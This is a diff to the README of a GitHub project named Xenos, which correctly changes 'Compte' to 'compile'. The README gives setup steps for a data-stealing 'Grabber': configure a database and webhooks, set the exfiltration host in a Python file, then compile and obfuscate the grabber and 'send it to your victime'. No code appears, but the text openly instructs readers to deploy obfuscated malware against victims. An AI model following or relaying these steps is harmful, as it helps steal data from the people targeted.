KanekiWeb/Xenos/README.md

 > 3. Make your database ip,databse name,username,password in the file `Inc/database.php`
 > 4. Setup your passwords and webhooks in `INC/functions.php`
 > 5. Make your host adress in `Grabber/python/Xenos.py` at line 5
-> 6. Compte and Obfusque your Grabber and send it to your victime :)
+> 6. compile and Obfusque your Grabber and send it to your victime :)

 > 7. Put a stars and follow me for more :)